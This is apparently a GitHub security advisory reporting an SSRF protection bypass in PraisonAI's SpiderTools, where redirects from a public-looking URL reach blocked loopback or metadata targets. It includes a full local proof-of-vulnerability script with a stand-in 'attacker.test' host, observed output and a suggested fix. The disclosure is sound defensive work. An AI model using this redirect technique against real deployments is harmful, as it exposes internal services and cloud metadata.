MEDIUM 6.5

GHSA-6h9p-93hq-q7h6

PraisonAI: SpiderTools redirect-target SSRF protection bypass

Details

# SpiderTools redirect-target SSRF protection bypass

## Summary

`SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets.

Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`.

The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`.

## Affected component

```text src/praisonai-agents/praisonaiagents/tools/spider_tools.py ```

Tested affected:

- `v3.9.24` / `d08d98ca` - `v3.9.26` / `62472a23` - `v4.6.56` / `d3c4a2af` - `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528` - current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`

No patched version is known at report time.

## Root cause

Current main validates only the caller-supplied URL:

```python if not self._validate_url(url): return {"error": f"Invalid or potentially dangerous URL: {url}"} ```

The fetch then uses Requests defaults:

```python response = session.get( url, timeout=timeout, verify=verify_ssl ) ```

Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`.

## Proof of vulnerability

The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`.

Full PoV:

```python #!/usr/bin/env python3 """Local PoV for SpiderTools redirect-target SSRF.

This uses only loopback services. The "attacker" hostname is treated as public during PraisonAI's initial URL validation, then routed to a local redirector so the PoV does not contact external infrastructure. The redirector points at a loopback-only internal service. Vulnerable behavior is confirmed when SpiderTools follows that redirect and returns the internal response body. """

from __future__ import annotations

import http.server import importlib.util import inspect import os import socket import socketserver import threading from typing import Any

def _load_spider_tools_class(): module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE") if module_file: spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file) if spec is None or spec.loader is None: raise RuntimeError(f"Could not load spider_tools file: {module_file}") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) return module.SpiderTools

from praisonaiagents.tools.spider_tools import SpiderTools

return SpiderTools

class InternalHandler(http.server.BaseHTTPRequestHandler): body = b"SPIDER-INTERNAL-SECRET"

def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(200) self.send_header("Content-Type", "text/html") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body)

def log_message(self, *_args: Any) -> None: return

class RedirectHandler(http.server.BaseHTTPRequestHandler): target = ""

def do_GET(self) -> None: # noqa: N802 self.server.hit = True # type: ignore[attr-defined] self.send_response(302) self.send_header("Location", self.target) self.end_headers()

def log_message(self, *_args: Any) -> None: return

def _called_from_spider_host_guard() -> bool: return any(frame.function == "_host_is_blocked" for frame in inspect.stack())

def main() -> int: os.environ.pop("ALLOW_LOCAL_CRAWL", None)

internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler) internal.hit = False # type: ignore[attr-defined] internal_port = internal.server_address[1]

RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret" redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler) redirect.hit = False # type: ignore[attr-defined] redirect_port = redirect.server_address[1]

threading.Thread(target=internal.serve_forever, daemon=True).start() threading.Thread(target=redirect.serve_forever, daemon=True).start()

original_getaddrinfo = socket.getaddrinfo

def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any): if host == "attacker.test": if _called_from_spider_host_guard(): return [ ( socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port), ) ] return original_getaddrinfo("127.0.0.1", port, *args, **kwargs) return original_getaddrinfo(host, port, *args, **kwargs)

tool = _load_spider_tools_class()() socket.getaddrinfo = fake_getaddrinfo try: direct_control = tool.scrape_page( f"http://127.0.0.1:{internal_port}/secret", timeout=5, ) redirect_result = tool.scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined]

redirect.hit = False # type: ignore[attr-defined] internal.hit = False # type: ignore[attr-defined]

import requests

original_session_get = requests.Session.get

def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def] kwargs.setdefault("allow_redirects", False) return original_session_get(self, url, **kwargs)

requests.Session.get = no_redirect_get try: no_redirect_control = _load_spider_tools_class()().scrape_page( f"http://attacker.test:{redirect_port}/go", timeout=5, ) finally: requests.Session.get = original_session_get no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined] no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined] finally: socket.getaddrinfo = original_getaddrinfo redirect.shutdown() internal.shutdown() redirect.server_close() internal.server_close()

print("DIRECT_CONTROL:", direct_control) print("REDIRECT_RESULT:", redirect_result) print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit) print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit) print("NO_REDIRECT_CONTROL:", no_redirect_control) print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit) print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit)

if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control): raise SystemExit("control failed: direct loopback was not blocked") if not isinstance(redirect_result, dict) or "error" in redirect_result: raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}") if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")): raise SystemExit("bypass failed: internal body was not returned") if not vulnerable_redirect_hit or not vulnerable_internal_hit: raise SystemExit("bypass failed: expected local servers were not hit") if not no_redirect_redirect_hit or no_redirect_internal_hit: raise SystemExit("fix control failed: no-redirect mode reached internal service")

print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback") return 0

if __name__ == "__main__": raise SystemExit(main()) ```

Run:

```fish cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \ uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \ poc_spider_tools_redirect_ssrf.py ```

Observed on current main:

```text DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'} REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...} REDIRECT_SERVER_HIT: True INTERNAL_SERVER_HIT: True NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...} NO_REDIRECT_SERVER_HIT: True NO_REDIRECT_INTERNAL_HIT: False PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback ```

The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response.

## Why this is not intended behavior

The Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and `extract_text` refuse dangerous URLs before network requests. The documented blocked classes include loopback, private/reserved IPs, link-local/cloud metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling forms. The same page states the validation is always on for bundled spider tools and does not require `enable_security()`.

The current code also documents `_validate_url()` as URL validation "to prevent SSRF attacks." A redirect to a loopback target bypasses that documented protection.

## Impact

An attacker who can influence a URL passed to `scrape_page()`, `extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process to request destinations that SpiderTools is designed to block.

Potential impact includes:

- reading loopback-only HTTP services; - probing or reading private network services reachable from the PraisonAI host; - reading link-local/cloud metadata endpoints if reachable in the deployment environment.

The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence.

## Severity

Suggested default severity: Moderate.

High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable.

## Suggested fix

Disable automatic redirects in `scrape_page()`:

```python response = session.get( url, timeout=timeout, verify=verify_ssl, allow_redirects=False, ) ```

If redirects should remain supported, follow them manually and validate every `Location` target before each hop using the same SSRF guard:

- require `http` or `https`; - resolve and validate every redirect hostname; - reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations; - cap redirect count; - apply the same safe fetch path to `scrape_page()`, `extract_links()`, `crawl()`, and `extract_text()`.

Regression tests should cover direct loopback rejection, public-to-loopback redirect rejection, public-to-public redirects if supported, and all `scrape_page()` callers.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / praisonaiagents

Introduced in: 0 Fixed in: 1.6.59

Fix pip install --upgrade 'praisonaiagents>=1.6.59'

Details

Are you affected?

Affected packages

References